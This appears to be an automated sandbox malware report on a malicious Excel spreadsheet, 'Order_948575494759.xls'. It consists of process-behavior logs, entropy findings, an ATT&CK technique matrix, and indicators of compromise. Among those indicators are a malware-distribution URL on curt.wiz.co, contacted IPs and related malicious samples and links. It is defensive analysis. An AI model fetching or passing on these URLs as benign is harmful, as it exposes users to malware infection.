Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: Order_948575494759.xlsStream path 'MBD0191BFB8/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: Order_948575494759.xlsStream path 'Workbook' entropy: 7.99854241372 (max. 8.0)
Source: 21830000.0.drStream path 'MBD0191BFB8/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: 21830000.0.drStream path 'Workbook' entropy: 7.9797056656 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 673Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts13
Exploitation for Client Execution
1
Scripting
1
Process Injection
3
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Order_948575494759.xls18%ReversingLabs
Order_948575494759.xls100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://curt.wiz.co/f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus100%Avira URL Cloudmalware
https://curt.wiz.co/f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus(Y100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
curt.wiz.co.cdn.gocache.net
170.82.173.30
truefalse
    high
    sni1gl.wpc.sigmacdn.net
    152.199.21.175
    truefalse
      high
      assets.msn.com
      unknown
      unknownfalse
        high
        curt.wiz.co
        unknown
        unknownfalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://curt.wiz.co/f0O8JN5298?&letter=muddy&gobbler=tiresome&nexusfalse
          • Avira URL Cloud: malware
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://curt.wiz.co/f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus(YOrder_948575494759.xls, 21830000.0.drfalse
          • Avira URL Cloud: malware
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          173.214.167.74
          unknownUnited States
          19318IS-AS-1USfalse
          170.82.173.30
          curt.wiz.co.cdn.gocache.netBrazil
          2664443LCLOUDINTERNETSERVICESLTDA-EPPBRfalse
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1577527
          Start date and time:2024-12-18 15:06:19 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 5m 48s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:defaultwindowsofficecookbook.jbs
          Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
          Run name:Potential for more IOCs and behavior
          Number of analysed new started processes analysed:32
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • GSI enabled (VBA)
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:Order_948575494759.xls
          Detection:MAL
          Classification:mal80.expl.winXLS@6/44@2/2
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .xls
          • Changed system and user locale, location and keyboard layout to French - France
          • Found Word or Excel or PowerPoint or XPS Viewer
          • Attach to Office via COM
          • Active ActiveX Object
          • Active ActiveX Object
          • Active ActiveX Object
          • Active ActiveX Object
          • Active ActiveX Object
          • Scroll down
          • Close Viewer
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SecurityHealthHost.exe, dllhost.exe, RuntimeBroker.exe, SIHClient.exe, appidcertstorecheck.exe, backgroundTaskHost.exe, BackgroundTransferHost.exe, sppsvc.exe, ShellExperienceHost.exe, WMIADAP.exe, conhost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 52.109.28.46, 20.42.73.24, 184.30.24.41, 104.126.37.224, 2.19.198.249, 104.126.36.33, 104.126.37.195, 2.19.198.224, 104.126.37.234, 52.113.194.132, 20.189.173.16, 20.198.119.143, 20.12.23.50, 20.190.181.6, 20.199.58.43, 152.199.21.175, 20.223.35.26
          • Excluded domains from analysis (whitelisted): e1324.dscd.akamaiedge.net, res-2.cdn.office.net, slscr.update.microsoft.com, onedscolprdeus03.eastus.cloudapp.azure.com, tse1.mm.bing.net, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, cdn-office.azureedge.net, wns.notify.trafficmanager.net, login.live.com, otelrules.svc.static.microsoft, officeclient.microsoft.com, e28578.d.akamaiedge.net, assets.msn.com.edgekey.net, ecs.office.com, client.wns.windows.com, prod.configsvc1.live.com.akadns.net, fd.api.iris.microsoft.com, uci.cdn.office.net, cdn-office.ec.azureedge.net, s-0005-office.config.skype.com, onedscolprdwus17.westus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com, res-prod.trafficmanager.net, s-0005.s-msedge.net, config.officeapps.live.com, res.public.onecdn.static.microsoft, uci.cdn.office.net.edgekey.net, ecs.office.trafficmanager.net, res.cdn.office.net, europe.configsvc1.live.com.akadns.net, mobile.events.data.trafficmanager.net, uks-azsc-config.officeapps.live.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtCreateFile calls found.
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtOpenFile calls found.
          • Report size getting too big, too many NtQueryAttributesFile calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadFile calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • VT rate limit hit for: Order_948575494759.xls
          TimeTypeDescription
          09:08:25API Interceptor806x Sleep call for process: splwow64.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          170.82.173.30eQcKjYOV30.exeGet hashmaliciousPushdoBrowse
          • www.mqs.com.br/
          file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
          • www.mqs.com.br/
          file.exeGet hashmaliciousPushdo, SmokeLoaderBrowse
          • www.mqs.com.br/
          file.exeGet hashmaliciousPushdo, SmokeLoaderBrowse
          • www.mqs.com.br/
          0fmEh2zmDj.exeGet hashmaliciousPushdoBrowse
          • www.mqs.com.br/
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          sni1gl.wpc.sigmacdn.netindex.html.docxGet hashmaliciousUnknownBrowse
          • 152.199.21.175
          https://syndiclair-my.sharepoint.com/:o:/g/personal/ml_syndiclair_fr/En8EbZMYpZ5CodZQ05mt4IMBGZHEHcSylnIeMh0DoULmZw?e=UkXb4YGet hashmaliciousUnknownBrowse
          • 152.199.21.175
          https://1drv.ms/w/c/17cc1e7b64547fa0/ER4uyAUCto9GkfZ_Sw-4_NAB9TeJj_jWV9oRzb3kdQINFQ?e=4%3aaVtPRh&sharingv2=true&fromShare=true&at=9Get hashmaliciousUnknownBrowse
          • 152.199.21.175
          174 Power Global_Enrollment_.docx.docGet hashmaliciousUnknownBrowse
          • 152.199.21.175
          https://mailustabucaedu-my.sharepoint.com/:u:/g/personal/stella_pabon_ustabuca_edu_co/EWCk8BqICKBBrExz32n-PvYBCVoLK4PToNCGKPT0vElGYg?e=w0tQWEGet hashmaliciousUnknownBrowse
          • 152.199.21.175
          wayneenterprisesbatcave-6.0.1901-windows-installer.msiGet hashmaliciousScreenConnect ToolBrowse
          • 152.199.21.175
          QyzM5yhuwd.exeGet hashmaliciousMedusaLockerBrowse
          • 152.199.21.175
          Document.xlaGet hashmaliciousUnknownBrowse
          • 152.199.21.175
          letter_sjoslin_odeonuk.com.pdfGet hashmaliciousUnknownBrowse
          • 152.195.19.97
          sjoslin@odeonuk.com_print.svgGet hashmaliciousUnknownBrowse
          • 152.195.19.97
          curt.wiz.co.cdn.gocache.netDocument.xlaGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          Document.xla.xlsxGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          3LCLOUDINTERNETSERVICESLTDA-EPPBRDocument.xlaGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          Document.xla.xlsxGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          IS-AS-1USnetworkmanager.exeGet hashmaliciousUnknownBrowse
          • 66.45.226.53
          arm6.elfGet hashmaliciousUnknownBrowse
          • 208.73.200.113
          jAktiuZ9R3.msiGet hashmaliciousUnknownBrowse
          • 162.220.166.184
          S54zm7jsZe.msiGet hashmaliciousUnknownBrowse
          • 162.220.166.184
          https://dashboard.sizle.io/p/f7c9cdf19Get hashmaliciousHTMLPhisherBrowse
          • 174.138.189.57
          fWAr4zGUkY.exeGet hashmaliciousRemcos, Amadey, StealcBrowse
          • 66.45.226.53
          file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRATBrowse
          • 205.209.109.10
          file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
          • 205.209.109.10
          file.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
          • 205.209.109.10
          No context
          No context
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):118
          Entropy (8bit):3.5700810731231707
          Encrypted:false
